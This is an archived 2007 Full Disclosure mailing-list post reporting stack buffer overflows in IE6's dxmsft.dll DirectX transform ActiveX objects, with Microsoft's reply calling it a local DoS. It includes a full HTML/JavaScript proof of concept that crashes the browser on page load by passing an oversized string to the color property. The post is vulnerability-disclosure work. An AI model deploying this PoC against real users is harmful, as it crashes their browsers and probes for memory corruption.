Full Disclosure mailing list archives

Multiple stack-based buffer overflows in dxmsft.dll

From: Elazar Broad <elazarb () earthlink net>
Date: Mon, 19 Nov 2007 17:30:32 -0500 (GMT-05:00)

There are multiple stack overflows in dxmsft.dll version 6.3.2900.3199(Image DirectX Transforms). This DLL exposes 
DirectX Image Transform objects which are safe for scripting. The issue is with the Color property of certain objects, 
so I am assuming this property is inherited from a base interface.
This affects WindowsXP SP2 IE6(fully patched), I have not tested this on
IE7 and it does not appear to affect Windows Server 2003 R2 SP2(newer version of the dxmsft.dll). I have not tested 
code execution, though it may be possible. I received the following response from Microsoft:

---

From our investigation this issue was found to be a stability problem which is not exploitable. The net effect of this 
issue is that IE will become unresponsive. The underlying operating system will still respond and Killing the process 
will stop the local DoS.

---

It did not hang IE on my machine, but instead crashed IE with a stack overflow. 
This may be related to http://www.securityfocus.com/bid/19029/.

PoC as follows:

---------------------
<!--
written by e.b.
-->
<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
     var s = "AAAA";

     while (s.length < 999999) s=s+s;

    var obj = new ActiveXObject("DXImageTransform.Microsoft.Chroma");
     obj.color = s;

    var obj = new ActiveXObject("DXImageTransform.Microsoft.DropShadow");
     obj.color = s;

    var obj = new ActiveXObject("DXImageTransform.Microsoft.Glow");
     obj.color = s;
 
    var obj = new ActiveXObject("DXImageTransform.Microsoft.MaskFilter");
     obj.color = s;

    var obj = new ActiveXObject("DXImageTransform.Microsoft.Shadow");
     obj.color = s;

   }
  </script>

 </head>
 <body onload="JavaScript: return Check();" />
</html>
---------------------

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Multiple stack-based buffer overflows in dxmsft.dll Elazar Broad (Nov 19)
- Knowing you're Secure! rchrafe (Nov 22)
- <Possible follow-ups>
- Re: Multiple stack-based buffer overflows in dxmsft.dll Elazar Broad (Nov 19)